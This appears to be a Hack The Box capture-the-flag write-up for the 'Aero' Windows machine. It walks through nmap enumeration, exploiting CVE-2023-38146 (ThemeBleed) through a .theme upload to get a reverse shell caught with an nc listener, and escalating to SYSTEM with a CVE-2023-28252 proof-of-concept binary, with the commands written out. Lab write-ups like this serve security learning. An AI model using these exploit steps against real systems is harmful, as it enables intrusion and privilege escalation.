AeroOctober 25, 2025 Created by Page Difficulty OS ctrlzero Hack The Box Medium Windows Enumeration I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.237 -oG scan /opt/extractports scan nmap -p80 -sCV 10.10.11.237 -oN ports I list the technologies used on the website using whatweb. I find the domain aerohub.htb and add it to the hosts file. whatweb http://10.10.11.237 Exploiting file upload When accessing the website, it indicates that we are dealing with a Windows 11 machine, and scrolling down a little, we find a section that allows us to upload .theme files. With this information, when searching for vulnerabilities, I am able to find CVE-2023-38146. To exploit this vulnerability, I use the Jnnshschl repository. This creates an SMB server, and if we listen on the port we have specified at the same time, we get an interactive shell. python3 themebleed.py -r 10.10.14.17 -p 4711 rlwrap -cAr nc -lvnp 4711 This way, we are connected to the system as the user sam.emerson and can read the first flag of the system. Privilege Escalation While exploring the system files, I located a file named CVE-2023-28252_Summary.pdf in the Documents folder of the user sam.emerson. The content refers to this CVE and the steps that must be taken to mitigate this vulnerability. When searching for information about this CVE, I found a POC that allows commands to be executed as the nt authority system user. When uploading this binary to the system and testing it, I saw that the changes to prevent this vulnerability had not yet been applied. Thanks to this, I can read the second flag of the system. .\clfs_eop.exe 'type C:\users\administrator\desktop\root.txt'